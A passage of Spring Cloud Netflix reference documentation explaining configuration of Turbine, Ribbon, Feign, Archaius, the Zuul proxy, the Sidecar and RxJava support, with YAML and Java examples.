The `clusterName` can be customized by a SpEL expression in `turbine.clusterNameExpression`, with root an instance of `InstanceInfo`. The default value is `appName`, which means that the Eureka serviceId ends up as the cluster key (i.e. the `InstanceInfo` for customers has an `appName` of "CUSTOMERS").
A different example would be `turbine.clusterNameExpression=aSGName`, which would get the cluster name from the AWS ASG name. Another example:

----
turbine:
  aggregator:
    clusterConfig: SYSTEM,USER
  appConfig: customers,stores,ui,admin
  clusterNameExpression: metadata['cluster']
----

In this case, the cluster name from 4 services is pulled from their metadata map, and is expected to have values that include "SYSTEM" and "USER".

To use the "default" cluster for all apps you need a string literal expression (with single quotes, and escaped with double quotes if it is in YAML as well):

----
turbine:
  appConfig: customers,stores
  clusterNameExpression: "'default'"
----

Spring Cloud provides a `spring-cloud-starter-turbine` that has all the dependencies you need to get a Turbine server running. Just create a Spring Boot application and annotate it with `@EnableTurbine`.

NOTE: by default Spring Cloud allows Turbine to use the host and port to allow multiple processes per host, per cluster. If you want the native Netflix behaviour built into Turbine that does _not_ allow multiple processes per host, per cluster (the key to the instance id is the hostname), then set the property `turbine.combineHostPort=false`.

=== Turbine Stream

In some environments (e.g. in a PaaS setting), the classic Turbine model of pulling metrics from all the distributed Hystrix commands doesn't work. In that case you might want to have your Hystrix commands push metrics to Turbine, and Spring Cloud enables that with messaging. All you need to do on the client is add a dependency on `spring-cloud-netflix-hystrix-stream` and the `spring-cloud-starter-stream-*` of your choice (see the Spring Cloud Stream documentation for details on the brokers and how to configure the client credentials; it should work out of the box for a local broker).

On the server side, just create a Spring Boot application and annotate it with `@EnableTurbineStream`; by default it will come up on port 8989 (point your Hystrix dashboard to that port, any path). You can customize the port using either `server.port` or `turbine.stream.port`. If you have `spring-boot-starter-web` and `spring-boot-starter-actuator` on the classpath as well, then you can open up the Actuator endpoints on a separate port (with Tomcat by default) by providing a `management.port` which is different.

You can then point the Hystrix Dashboard to the Turbine Stream Server instead of individual Hystrix streams. If Turbine Stream is running on port 8989 on myhost, then put `http://myhost:8989` in the stream input field in the Hystrix Dashboard. Circuits will be prefixed by their respective serviceId, followed by a dot, then the circuit name.

Spring Cloud provides a `spring-cloud-starter-turbine-stream` that has all the dependencies you need to get a Turbine Stream server running - just add the Stream binder of your choice, e.g. `spring-cloud-starter-stream-rabbit`. You need Java 8 to run the app because it is Netty-based.

[[spring-cloud-ribbon]]
== Client Side Load Balancer: Ribbon

Ribbon is a client side load balancer which gives you a lot of control over the behaviour of HTTP and TCP clients. Feign already uses Ribbon, so if you are using `@FeignClient` then this section also applies.

A central concept in Ribbon is that of the named client.
Each load balancer is part of an ensemble of components that work together to contact a remote server on demand, and the ensemble has a name that you give it as an application developer (e.g. using the `@FeignClient` annotation). Spring Cloud creates a new ensemble as an `ApplicationContext` on demand for each named client using `RibbonClientConfiguration`. This contains (amongst other things) an `ILoadBalancer`, a `RestClient`, and a `ServerListFilter`.

=== Customizing the Ribbon Client

You can configure some bits of a Ribbon client using external properties in `<client>.ribbon.*`, which is no different than using the Netflix APIs natively, except that you can use Spring Boot configuration files. The native options can be inspected as static fields in `CommonClientConfigKey` (part of ribbon-core).

Spring Cloud also lets you take full control of the client by declaring additional configuration (on top of the `RibbonClientConfiguration`) using `@RibbonClient`. Example:

[source,java,indent=0]
----
@Configuration
@RibbonClient(name = "foo", configuration = FooConfiguration.class)
public class TestConfiguration {
}
----

In this case the client is composed from the components already in `RibbonClientConfiguration` together with any in `FooConfiguration` (where the latter generally will override the former).

WARNING: The `FooConfiguration` has to be `@Configuration`, but take care that it is not in a `@ComponentScan` for the main application context, otherwise it will be shared by all the `@RibbonClients`. If you use `@ComponentScan` (or `@SpringBootApplication`) you need to take steps to avoid it being included (for instance put it in a separate, non-overlapping package, or specify the packages to scan explicitly in the `@ComponentScan`).

Spring Cloud Netflix provides the following beans by default for Ribbon (`BeanType` beanName: `ClassName`):

* `IClientConfig` ribbonClientConfig: `DefaultClientConfigImpl`
* `IRule` ribbonRule: `ZoneAvoidanceRule`
* `IPing` ribbonPing: `NoOpPing`
* `ServerList<Server>` ribbonServerList: `ConfigurationBasedServerList`
* `ServerListFilter<Server>` ribbonServerListFilter: `ZonePreferenceServerListFilter`
* `ILoadBalancer` ribbonLoadBalancer: `ZoneAwareLoadBalancer`

Creating a bean of one of those types and placing it in a `@RibbonClient` configuration (such as `FooConfiguration` above) allows you to override each one of the beans described. Example:

[source,java,indent=0]
----
@Configuration
public class FooConfiguration {
    @Bean
    public IPing ribbonPing(IClientConfig config) {
        return new PingUrl();
    }
}
----

This replaces the `NoOpPing` with `PingUrl`.
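
The same mechanism works for the other beans in the list; for example, a sketch (not from the original text) that swaps the default `ZoneAvoidanceRule` for another of Ribbon's built-in rules:

[source,java,indent=0]
----
@Configuration
public class FooConfiguration {
    @Bean
    public IRule ribbonRule(IClientConfig config) {
        // use Ribbon's built-in AvailabilityFilteringRule instead of the default
        return new AvailabilityFilteringRule();
    }
}
----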

=== Using Ribbon with Eureka

When Eureka is used in conjunction with Ribbon, the `ribbonServerList` is overridden with an extension of `DiscoveryEnabledNIWSServerList` which populates the list of servers from Eureka. It also replaces the `IPing` interface with `NIWSDiscoveryPing`, which delegates to Eureka to determine if a server is up. The `ServerList` that is installed by default is a `DomainExtractingServerList`, and the purpose of this is to make physical metadata available to the load balancer without using AWS AMI metadata (which is what Netflix relies on). By default the server list will be constructed with "zone" information as provided in the instance metadata (so on the remote clients set `eureka.instance.metadataMap.zone`), and if that is missing it can use the domain name from the server hostname as a proxy for zone (if the flag `approximateZoneFromHostname` is set). Once the zone information is available it can be used in a `ServerListFilter`. By default it will be used to locate a server in the same zone as the client, because the default is a `ZonePreferenceServerListFilter`. The zone of the client is determined the same way as for the remote instances by default, i.e. via `eureka.instance.metadataMap.zone`.

NOTE: The orthodox "archaius" way to set the client zone is via a configuration property called "@zone", and Spring Cloud will use that in preference to all other settings if it is available (note that the key will have to be quoted in YAML configuration).

NOTE: If there is no other source of zone data, then a guess is made based on the client configuration (as opposed to the instance configuration). We take `eureka.client.availabilityZones`, which is a map from region name to a list of zones, and pull out the first zone for the instance's own region (i.e. the `eureka.client.region`, which defaults to "us-east-1" for compatibility with native Netflix).

[[spring-cloud-ribbon-without-eureka]]
=== Example: How to Use Ribbon Without Eureka

Eureka is a convenient way to abstract the discovery of remote servers so you don't have to hard code their URLs in clients, but if you prefer not to use it, Ribbon and Feign are still quite amenable. Suppose you have declared a `@RibbonClient` for "stores", and Eureka is not in use (and not even on the classpath). The Ribbon client defaults to a configured server list, and you can supply the configuration like this:

.application.yml
----
stores:
  ribbon:
    listOfServers: example.com,google.com
----

=== Example: Disable Eureka use in Ribbon

Setting the property `ribbon.eureka.enabled = false` will explicitly disable the use of Eureka in Ribbon.

.application.yml
----
ribbon:
  eureka:
    enabled: false
----

=== Using the Ribbon API Directly

You can also use the `LoadBalancerClient` directly. Example:

[source,java,indent=0]
----
public class MyClass {
    @Autowired
    private LoadBalancerClient loadBalancer;

    public void doStuff() {
        ServiceInstance instance = loadBalancer.choose("stores");
        URI storesUri = URI.create(String.format("http://%s:%s", instance.getHost(), instance.getPort()));
        // ... do something with the URI
    }
}
----
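
The `LoadBalancerClient` can also choose an instance and execute a request callback against it in one step; a sketch, reusing the same "stores" service (the callback body is illustrative):

[source,java,indent=0]
----
public String doStuffWithCallback() throws IOException {
    return loadBalancer.execute("stores", instance -> {
        // the chosen ServiceInstance is handed to the callback
        URI storesUri = URI.create(String.format("http://%s:%s", instance.getHost(), instance.getPort()));
        // ... call the instance and return the result
        return storesUri.toString();
    });
}
----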

[[spring-cloud-feign]]
== Declarative REST Client: Feign

https://github.com/Netflix/feign[Feign] is a declarative web service client. It makes writing web service clients easier. To use Feign create an interface and annotate it. It has pluggable annotation support, including Feign annotations and JAX-RS annotations. Feign also supports pluggable encoders and decoders. Spring Cloud adds support for Spring MVC annotations and for using the same `HttpMessageConverters` used by default in Spring Web. Spring Cloud integrates Ribbon and Eureka to provide a load balanced HTTP client when using Feign.

Example Spring Boot app:

[source,java,indent=0]
----
@Configuration
@ComponentScan
@EnableAutoConfiguration
@EnableEurekaClient
@EnableFeignClients
public class Application {

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

}
----

.StoreClient.java
[source,java,indent=0]
----
@FeignClient("stores")
public interface StoreClient {
    @RequestMapping(method = RequestMethod.GET, value = "/stores")
    List<Store> getStores();

    @RequestMapping(method = RequestMethod.POST, value = "/stores/{storeId}", consumes = "application/json")
    Store update(@PathVariable("storeId") Long storeId, Store store);
}
----

In the `@FeignClient` annotation the String value ("stores" above) is an arbitrary client name, which is used to create a Ribbon load balancer (see <<spring-cloud-ribbon,below for details of Ribbon support>>). You can also specify a URL using the `url` attribute (absolute value or just a hostname). The name of the bean in the application context is the fully qualified name of the interface. An alias is also created, which is the 'name' attribute plus 'FeignClient'. For the example above, `@Qualifier("storesFeignClient")` could be used to reference the bean.

The Ribbon client above will want to discover the physical addresses for the "stores" service. If your application is a Eureka client then it will resolve the service in the Eureka service registry. If you don't want to use Eureka, you can simply configure a list of servers in your external configuration (see <<spring-cloud-ribbon-without-eureka,above for example>>).

[[spring-cloud-feign-overriding-defaults]]
=== Overriding Feign Defaults

A central concept in Spring Cloud's Feign support is that of the named client. Each Feign client is part of an ensemble of components that work together to contact a remote server on demand, and the ensemble has a name that you give it as an application developer using the `@FeignClient` annotation. Spring Cloud creates a new ensemble as an `ApplicationContext` on demand for each named client using `FeignClientsConfiguration`. This contains (amongst other things) a `feign.Decoder`, a `feign.Encoder`, and a `feign.Contract`.

Spring Cloud lets you take full control of the Feign client by declaring additional configuration (on top of the `FeignClientsConfiguration`) using `@FeignClient`. Example:

[source,java,indent=0]
----
@FeignClient(name = "stores", configuration = FooConfiguration.class)
public interface StoreClient {
    //..
}
----

In this case the client is composed from the components already in `FeignClientsConfiguration` together with any in `FooConfiguration` (where the latter will override the former).

WARNING: The `FooConfiguration` has to be `@Configuration`, but take care that it is not in a `@ComponentScan` for the main application context, otherwise it will be used for every `@FeignClient`. If you use `@ComponentScan` (or `@SpringBootApplication`) you need to take steps to avoid it being included (for instance put it in a separate, non-overlapping package, or specify the packages to scan explicitly in the `@ComponentScan`).

NOTE: The `serviceId` attribute is now deprecated in favor of the `name` attribute.

WARNING: Previously, using the `url` attribute did not require the `name` attribute.
Using `name` is now required.

Placeholders are supported in the `name` and `url` attributes.

[source,java,indent=0]
----
@FeignClient(name = "${feign.name}", url = "${feign.url}")
public interface StoreClient {
    //..
}
----

Spring Cloud Netflix provides the following beans by default for Feign (`BeanType` beanName: `ClassName`):

* `Decoder` feignDecoder: `ResponseEntityDecoder` (which wraps a `SpringDecoder`)
* `Encoder` feignEncoder: `SpringEncoder`
* `Logger` feignLogger: `Slf4jLogger`
* `Contract` feignContract: `SpringMvcContract`
* `Feign.Builder` feignBuilder: `HystrixFeign.Builder`

Spring Cloud Netflix _does not_ provide the following beans by default for Feign, but still looks up beans of these types from the application context to create the Feign client:

* `Logger.Level`
* `Retryer`
* `ErrorDecoder`
* `Request.Options`
* `Collection<RequestInterceptor>`

Creating a bean of one of those types and placing it in a `@FeignClient` configuration (such as `FooConfiguration` above) allows you to override each one of the beans described. Example:

[source,java,indent=0]
----
@Configuration
public class FooConfiguration {
    @Bean
    public Contract feignContract() {
        return new feign.Contract.Default();
    }

    @Bean
    public BasicAuthRequestInterceptor basicAuthRequestInterceptor() {
        return new BasicAuthRequestInterceptor("user", "password");
    }
}
----

This replaces the `SpringMvcContract` with `feign.Contract.Default` and adds a `RequestInterceptor` to the collection of `RequestInterceptor`s.

Default configurations can be specified in the `@EnableFeignClients` attribute `defaultConfiguration` in a similar manner as described above. The difference is that this configuration will apply to _all_ Feign clients.

[[spring-cloud-feign-hystrix]]
=== Feign Hystrix Support

If Hystrix is on the classpath, by default Feign will wrap all methods with a circuit breaker. Returning a `com.netflix.hystrix.HystrixCommand` is also available. This lets you use reactive patterns (with a call to `.toObservable()` or `.observe()`) or asynchronous use (with a call to `.queue()`).

To disable Hystrix support for Feign, set `feign.hystrix.enabled=false`.

To disable Hystrix support on a per-client basis create a vanilla `Feign.Builder` with the "prototype" scope, e.g.:

[source,java,indent=0]
----
@Configuration
public class FooConfiguration {
    @Bean
    @Scope("prototype")
    public Feign.Builder feignBuilder() {
        return Feign.builder();
    }
}
----

[[spring-cloud-feign-hystrix-fallback]]
=== Feign Hystrix Fallbacks

Hystrix supports the notion of a fallback: a default code path that is executed when the circuit is open or there is an error. To enable fallbacks for a given `@FeignClient` set the `fallback` attribute to the class name that implements the fallback.

[source,java,indent=0]
----
@FeignClient(name = "hello", fallback = HystrixClientFallback.class)
protected interface HystrixClient {
    @RequestMapping(method = RequestMethod.GET, value = "/hello")
    Hello iFailSometimes();
}

static class HystrixClientFallback implements HystrixClient {
    @Override
    public Hello iFailSometimes() {
        return new Hello("fallback");
    }
}
----

WARNING: There is a limitation with the implementation of fallbacks in Feign and how Hystrix fallbacks work.
Fallbacks are currently not supported for methods that return `com.netflix.hystrix.HystrixCommand` and `rx.Observable`.

[[spring-cloud-feign-inheritance]]
=== Feign Inheritance Support

Feign supports boilerplate APIs via single-inheritance interfaces. This allows grouping common operations into convenient base interfaces.

.UserService.java
[source,java,indent=0]
----
public interface UserService {

    @RequestMapping(method = RequestMethod.GET, value = "/users/{id}")
    User getUser(@PathVariable("id") long id);
}
----

.UserResource.java
[source,java,indent=0]
----
@RestController
public class UserResource implements UserService {

}
----

.UserClient.java
[source,java,indent=0]
----
package project.user;

@FeignClient("users")
public interface UserClient extends UserService {

}
----

NOTE: It is generally not advisable to share an interface between a server and a client. It introduces tight coupling, and also actually doesn't work with Spring MVC in its current form (method parameter mapping is not inherited).

=== Feign request/response compression

You may consider enabling the request or response GZIP compression for your Feign requests. You can do this by enabling one of the properties:

[source,java]
----
feign.compression.request.enabled=true
feign.compression.response.enabled=true
----

Feign request compression gives you settings similar to what you may set for your web server:

[source,java]
----
feign.compression.request.enabled=true
feign.compression.request.mime-types=text/xml,application/xml,application/json
feign.compression.request.min-request-size=2048
----

These properties allow you to be selective about the compressed media types and the minimum request threshold length.

=== Feign logging

A logger is created for each Feign client. By default the name of the logger is the full class name of the interface used to create the Feign client. Feign logging only responds to the `DEBUG` level.

.application.yml

[source,yaml]
----
logging.level.project.user.UserClient: DEBUG
----

The `Logger.Level` object, which you may configure per client, tells Feign how much to log. Choices are:

* `NONE`, No logging (*DEFAULT*).
* `BASIC`, Log only the request method and URL and the response status code and execution time.
* `HEADERS`, Log the basic information along with request and response headers.
* `FULL`, Log the headers, body, and metadata for both requests and responses.

For example, the following would set the `Logger.Level` to `FULL`:

[source,java,indent=0]
----
@Configuration
public class FooConfiguration {
    @Bean
    Logger.Level feignLoggerLevel() {
        return Logger.Level.FULL;
    }
}
----

== External Configuration: Archaius

https://github.com/Netflix/archaius[Archaius] is the Netflix client side configuration library. It is the library used by all of the Netflix OSS components for configuration. Archaius is an extension of the http://commons.apache.org/proper/commons-configuration[Apache Commons Configuration] project. It allows updates to configuration by either polling a source for changes or for a source to push changes to the client.
Archaius uses `Dynamic<Type>Property` classes as handles to properties.

.Archaius Example
[source,java]
----
class ArchaiusTest {
    DynamicStringProperty myprop = DynamicPropertyFactory
            .getInstance()
            .getStringProperty("my.prop", null);

    void doSomething() {
        OtherClass.someMethod(myprop.get());
    }
}
----

Archaius has its own set of configuration files and loading priorities. Spring applications should generally not use Archaius directly, but the need to configure the Netflix tools natively remains. Spring Cloud has a Spring Environment Bridge so that Archaius can read properties from the Spring Environment. This allows Spring Boot projects to use the normal configuration toolchain, while allowing them to configure the Netflix tools, for the most part, as documented.

== Router and Filter: Zuul

Routing is an integral part of a microservice architecture. For example, `/` may be mapped to your web application, `/api/users` is mapped to the user service and `/api/shop` is mapped to the shop service. https://github.com/Netflix/zuul[Zuul] is a JVM based router and server side load balancer by Netflix.

http://www.slideshare.net/MikeyCohen1/edge-architecture-ieee-international-conference-on-cloud-engineering-32240146/27[Netflix uses Zuul] for the following:

* Authentication
* Insights
* Stress Testing
* Canary Testing
* Dynamic Routing
* Service Migration
* Load Shedding
* Security
* Static Response handling
* Active/Active traffic management

Zuul's rule engine allows rules and filters to be written in essentially any JVM language, with built-in support for Java and Groovy.

NOTE: The configuration property `zuul.max.host.connections` has been replaced by two new properties, `zuul.host.maxTotalConnections` and `zuul.host.maxPerRouteConnections`, which default to 200 and 20 respectively.

[[netflix-zuul-reverse-proxy]]
=== Embedded Zuul Reverse Proxy

Spring Cloud has created an embedded Zuul proxy to ease the development of a very common use case where a UI application wants to proxy calls to one or more back end services. This feature is useful for a user interface to proxy to the backend services it requires, avoiding the need to manage CORS and authentication concerns independently for all the backends.

To enable it, annotate a Spring Boot main class with `@EnableZuulProxy` (see the sketch below), and this forwards local calls to the appropriate service. By convention, a service with the ID "users" will receive requests from the proxy located at `/users` (with the prefix stripped). The proxy uses Ribbon to locate an instance to forward to via discovery, and all requests are executed in a Hystrix command, so failures will show up in Hystrix metrics, and once the circuit is open the proxy will not try to contact the service.

NOTE: the Zuul starter does not include a discovery client, so for routes based on service IDs you need to provide one of those on the classpath as well (e.g. Eureka is one choice).
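
A minimal sketch of such a main class (the class name is illustrative):

[source,java,indent=0]
----
@SpringBootApplication
@EnableZuulProxy
public class GatewayApplication {

    public static void main(String[] args) {
        SpringApplication.run(GatewayApplication.class, args);
    }

}
----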

To skip having a service automatically added, set `zuul.ignored-services` to a list of service ID patterns. If a service matches a pattern that is ignored, but is also included in the explicitly configured routes map, then it will be unignored. Example:

.application.yml
[source,yaml]
----
zuul:
  ignoredServices: '*'
  routes:
    users: /myusers/**
----

In this example, all services are ignored *except* "users".

To augment or change the proxy routes, you can add external configuration like the following:

.application.yml
[source,yaml]
----
zuul:
  routes:
    users: /myusers/**
----

This means that HTTP calls to "/myusers" get forwarded to the "users" service (for example "/myusers/101" is forwarded to "/101").

To get more fine-grained control over a route you can specify the path and the serviceId independently:

.application.yml
[source,yaml]
----
zuul:
  routes:
    users:
      path: /myusers/**
      serviceId: users_service
----

This means that HTTP calls to "/myusers" get forwarded to the "users_service" service. The route has to have a "path", which can be specified as an ant-style pattern, so "/myusers/{asterisk}" only matches one level, but "/myusers/{all}" matches hierarchically.

The location of the backend can be specified as either a "serviceId" (for a service from discovery) or a "url" (for a physical location), e.g.

.application.yml
[source,yaml]
----
zuul:
  routes:
    users:
      path: /myusers/**
      url: http://example.com/users_service
----

These simple url-routes don't get executed as a `HystrixCommand`, nor can you load balance multiple URLs with Ribbon. To achieve this, specify a service-route and configure a Ribbon client for the serviceId (this currently requires disabling Eureka support in Ribbon: see <<spring-cloud-ribbon-without-eureka,above for more information>>), e.g.

.application.yml
[source,yaml]
----
zuul:
  routes:
    users:
      path: /myusers/**
      serviceId: users

ribbon:
  eureka:
    enabled: false

users:
  ribbon:
    listOfServers: example.com,google.com
----

You can provide a convention between serviceId and routes using a regex mapper. It uses regular expression named groups to extract variables from the serviceId and inject them into a route pattern.

.ApplicationConfiguration.java
[source,java]
----
@Bean
public PatternServiceRouteMapper serviceRouteMapper() {
    return new PatternServiceRouteMapper(
        "(?<name>^.+)-(?<version>v.+$)",
        "${version}/${name}");
}
----

This means that a serviceId "myusers-v1" will be mapped to route "/v1/myusers/{all}". Any regular expression is accepted, but all named groups must be present in both `servicePattern` and `routePattern`. If `servicePattern` does not match a serviceId, the default behavior is used. In the example above, a serviceId "myusers" will be mapped to route "/myusers/{all}" (no version detected). This feature is disabled by default and only applies to discovered services.

To add a prefix to all mappings, set `zuul.prefix` to a value, such as `/api`. The proxy prefix is stripped from the request before the request is forwarded by default (switch this behaviour off with `zuul.stripPrefix=false`). You can also switch off the stripping of the service-specific prefix from individual routes, e.g.

.application.yml
[source,yaml]
----
zuul:
  routes:
    users:
      path: /myusers/**
      stripPrefix: false
----

In this example, requests to "/myusers/101" will be forwarded to "/myusers/101" on the "users" service.

The `zuul.routes` entries actually bind to an object of type `ZuulProperties`. If you look at the properties of that object you will see that it also has a "retryable" flag. Set that flag to "true" to have the Ribbon client automatically retry failed requests (and if you need to, you can modify the parameters of the retry operations using the Ribbon client configuration).
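
A sketch of a route with retries enabled (reusing the "users" route from the examples above):

.application.yml
[source,yaml]
----
zuul:
  routes:
    users:
      path: /myusers/**
      retryable: true
----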

The `X-Forwarded-Host` header is added to the forwarded requests by default. To turn it off set `zuul.addProxyHeaders = false`. The prefix path is stripped by default, and the request to the backend picks up a header "X-Forwarded-Prefix" ("/myusers" in the examples above).

An application with `@EnableZuulProxy` could act as a standalone server if you set a default route ("/"); for example `zuul.routes.home: /` would route all traffic (i.e. "/{all}") to the "home" service.

If more fine-grained ignoring is needed, you can specify specific patterns to ignore. These patterns are evaluated at the start of the route location process, which means prefixes should be included in the pattern to warrant a match. Ignored patterns span all services and supersede any other route specification.

.application.yml
[source,yaml]
----
zuul:
  ignoredPatterns: /**/admin/**
  routes:
    users: /myusers/**
----

This means that all calls such as "/myusers/101" will be forwarded to "/101" on the "users" service, but calls including "/admin/" will not resolve.

=== Cookies and Sensitive Headers

It's OK to share headers between services in the same system, but you probably don't want sensitive headers leaking downstream into external servers. You can specify a list of ignored headers as part of the route configuration. Cookies play a special role because they have well-defined semantics in browsers, and they are always to be treated as sensitive. If the consumer of your proxy is a browser, then cookies for downstream services also cause problems for the user because they all get jumbled up (all downstream services look like they come from the same place).

If you are careful with the design of your services, for example if only one of the downstream services sets cookies, then you might be able to let them flow from the backend all the way up to the caller. Also, if your proxy sets cookies and all your back end services are part of the same system, it can be natural to simply share them (and for instance use Spring Session to link them up to some shared state). Other than that, any cookies that get set by downstream services are likely to be not very useful to the caller, so it is recommended that you make (at least) "Set-Cookie" and "Cookie" into sensitive headers for routes that are not part of your domain. Even for routes that *are* part of your domain, try to think carefully about what it means before allowing cookies to flow between them and the proxy.

The sensitive headers can be configured as a comma-separated list per route, e.g.

.application.yml
[source,yaml]
----
zuul:
  routes:
    users:
      path: /myusers/**
      sensitiveHeaders: Cookie,Set-Cookie,Authorization
      url: https://downstream
----

Sensitive headers can also be set globally by setting `zuul.sensitiveHeaders`. If `sensitiveHeaders` is set on a route, this will override the global `sensitiveHeaders` setting.
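
A sketch of the global form (the list shown happens to match the default, per the note below):

.application.yml
[source,yaml]
----
zuul:
  sensitiveHeaders: Cookie,Set-Cookie,Authorization
----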

NOTE: this is the default value for `sensitiveHeaders`, so you don't need to set it unless you want it to be different. N.B. this is new in Spring Cloud Netflix 1.1 (in 1.0 the user had no control over headers and all cookies flowed in both directions).

In addition to the per-route sensitive headers, you can set a global value for `zuul.ignoredHeaders` for values that should be discarded (both request and response) during interactions with downstream services. By default these are empty if Spring Security is not on the classpath, and otherwise they are initialized to a set of well-known "security" headers (e.g. involving caching) as specified by Spring Security. The assumption in this case is that the downstream services might add these headers too, and we want the values from the proxy.

=== The Routes Endpoint

If you are using `@EnableZuulProxy` with the Spring Boot Actuator you will enable (by default) an additional endpoint, available via HTTP as `/routes`. A GET to this endpoint will return a list of the mapped routes. A POST will force a refresh of the existing routes (e.g. in case there have been changes in the service catalog).

NOTE: the routes should respond automatically to changes in the service catalog, but the POST to `/routes` is a way to force the change to happen immediately.

=== Strangulation Patterns and Local Forwards

A common pattern when migrating an existing application or API is to "strangle" old endpoints, slowly replacing them with different implementations. The Zuul proxy is a useful tool for this because you can use it to handle all traffic from clients of the old endpoints, but redirect some of the requests to new ones.

Example configuration:

.application.yml
[source,yaml]
----
zuul:
  routes:
    first:
      path: /first/**
      url: http://first.example.com
    second:
      path: /second/**
      url: forward:/second
    third:
      path: /third/**
      url: forward:/3rd
    legacy:
      path: /**
      url: http://legacy.example.com
----

In this example we are strangling the "legacy" app, which is mapped to all requests that do not match one of the other patterns. Paths in `/first/{all}` have been extracted into a new service with an external URL. Paths in `/second/{all}` are forwarded so they can be handled locally, e.g. with a normal Spring `@RequestMapping`. Paths in `/third/{all}` are also forwarded, but with a different prefix (i.e. `/third/foo` is forwarded to `/3rd/foo`).

NOTE: The ignored patterns aren't completely ignored, they just aren't handled by the proxy (so they are also effectively forwarded locally).

=== Uploading Files through Zuul

If you `@EnableZuulProxy` you can use the proxy paths to upload files and it should just work, as long as the files are small. For large files there is an alternative path which bypasses the Spring `DispatcherServlet` (to avoid multipart processing) in "/zuul/{asterisk}". I.e. if `zuul.routes.customers=/customers/{all}` then you can POST large files to "/zuul/customers/*". The servlet path is externalized via `zuul.servletPath`. Extremely large files will also require elevated timeout settings if the proxy route takes you through a Ribbon load balancer, e.g.

.application.yml
[source,yaml]
----
hystrix.command.default.execution.isolation.thread.timeoutInMilliseconds: 60000
ribbon:
  ConnectTimeout: 3000
  ReadTimeout: 60000
----

Note that for streaming to work with large files, you need to use chunked encoding in the request (which some browsers do not do by default), e.g.
on the command line:

----
$ curl -v -H "Transfer-Encoding: chunked" \
    -F "file=@mylarge.iso" localhost:9999/zuul/simple/file
----

=== Plain Embedded Zuul

You can also run a Zuul server without the proxying, or switch on parts of the proxying platform selectively, if you use `@EnableZuulServer` (instead of `@EnableZuulProxy`). Any beans that you add to the application of type `ZuulFilter` will be installed automatically, as they are with `@EnableZuulProxy`, but without any of the proxy filters being added automatically.

In this case the routes into the Zuul server are still specified by configuring "zuul.routes.{asterisk}", but there is no service discovery and no proxying, so the "serviceId" and "url" settings are ignored. For example:

.application.yml
[source,yaml]
----
zuul:
  routes:
    api: /api/**
----

maps all paths in "/api/{all}" to the Zuul filter chain.

=== Disable Zuul Filters

Zuul for Spring Cloud comes with a number of `ZuulFilter` beans enabled by default in both proxy and server mode. See https://github.com/spring-cloud/spring-cloud-netflix/tree/master/spring-cloud-netflix-core/src/main/java/org/springframework/cloud/netflix/zuul/filters[the zuul filters package] for the possible filters that are enabled. If you want to disable one, simply set `zuul.<SimpleClassName>.<filterType>.disable=true`. By convention, the package after `filters` is the Zuul filter type. For example, to disable `org.springframework.cloud.netflix.zuul.filters.post.SendResponseFilter` set `zuul.SendResponseFilter.post.disable=true`.

=== Polyglot support with Sidecar

Do you have non-JVM languages you want to take advantage of Eureka, Ribbon and Config Server? The Spring Cloud Netflix Sidecar was inspired by https://github.com/Netflix/Prana[Netflix Prana]. It includes a simple HTTP API to get all of the instances (i.e. host and port) for a given service. You can also proxy service calls through an embedded Zuul proxy which gets its route entries from Eureka. The Spring Cloud Config Server can be accessed directly via host lookup or through the Zuul Proxy. The non-JVM app should implement a health check so the Sidecar can report to Eureka whether the app is up or down.

To enable the Sidecar, create a Spring Boot application with `@EnableSidecar`. This annotation includes `@EnableCircuitBreaker`, `@EnableDiscoveryClient`, and `@EnableZuulProxy`. Run the resulting application on the same host as the non-JVM application.

To configure the sidecar, add `sidecar.port` and `sidecar.health-uri` to `application.yml`. The `sidecar.port` property is the port the non-JVM app is listening on. This is so the Sidecar can properly register the app with Eureka. The `sidecar.health-uri` is a URI accessible on the non-JVM app that mimics a Spring Boot health indicator. It should return a JSON document like the following:

.health-uri-document
[source,json]
----
{
  "status":"UP"
}
----

Here is an example application.yml for a Sidecar application:

.application.yml
[source,yaml]
----
server:
  port: 5678
spring:
  application:
    name: sidecar

sidecar:
  port: 8000
  health-uri: http://localhost:8000/health.json
----

The API for the `DiscoveryClient.getInstances()` method is `/hosts/{serviceId}`. Here is an example response for `/hosts/customers` that returns two instances on different hosts.
This API is accessible to the non-JVM app (if the sidecar is on port 5678) at `http://localhost:5678/hosts/{serviceId}`.

./hosts/customers
[source,json]
----
[
    {
        "host": "myhost",
        "port": 9000,
        "uri": "http://myhost:9000",
        "serviceId": "CUSTOMERS",
        "secure": false
    },
    {
        "host": "myhost2",
        "port": 9000,
        "uri": "http://myhost2:9000",
        "serviceId": "CUSTOMERS",
        "secure": false
    }
]
----

The Zuul proxy automatically adds routes for each service known in Eureka to `/<serviceId>`, so the customers service is available at `/customers`. The non-JVM app can access the customer service via `http://localhost:5678/customers` (assuming the sidecar is listening on port 5678).

If the Config Server is registered with Eureka, the non-JVM application can access it via the Zuul proxy. If the serviceId of the Config Server is `configserver` and the Sidecar is on port 5678, then it can be accessed at `http://localhost:5678/configserver`.

The non-JVM app can take advantage of the Config Server's ability to return YAML documents. For example, a call to `http://sidecar.local.spring.io:5678/configserver/default-master.yml` might result in a YAML document like the following:

[source,yaml]
----
eureka:
  client:
    serviceUrl:
      defaultZone: http://localhost:8761/eureka/
  password: password
info:
  description: Spring Cloud Samples
  url: https://github.com/spring-cloud-samples
----

[[netflix-rxjava-springmvc]]
== RxJava with Spring MVC

Spring Cloud Netflix includes https://github.com/ReactiveX/RxJava[RxJava].

> RxJava is a Java VM implementation of http://reactivex.io/[Reactive Extensions]: a library for composing asynchronous and event-based programs by using observable sequences.

Spring Cloud Netflix provides support for returning `rx.Single` objects from Spring MVC Controllers. It also supports using `rx.Observable` objects for https://en.wikipedia.org/wiki/Server-sent_events[Server-sent events (SSE)]. This can be very convenient if your internal APIs are already built using RxJava (see <<spring-cloud-feign-hystrix>> for examples).

Here are some examples of using `rx.Single`:

[source,java]
----
include::../../../../spring-cloud-netflix-core/src/test/java/org/springframework/cloud/netflix/rx/SingleReturnValueHandlerTest.java[tags=rx_single,indent=0]
----

If you have an `Observable`, rather than a single, you can use `.toSingle()` or `.toList().toSingle()`. Here are some examples:

[source,java]
----
include::../../../../spring-cloud-netflix-core/src/test/java/org/springframework/cloud/netflix/rx/ObservableReturnValueHandlerTest.java[tags=rx_observable,indent=0]
----

If you have a streaming endpoint and client, SSE could be an option. To convert `rx.Observable` to a Spring `SseEmitter` use `RxResponse.sse()`. Here are some examples:

[source,java]
----
include::../../../../spring-cloud-netflix-core/src/test/java/org/springframework/cloud/netflix/rx/ObservableSseEmitterTest.java[tags=rx_observable_sse,indent=0]
----

[[netflix-metrics]]
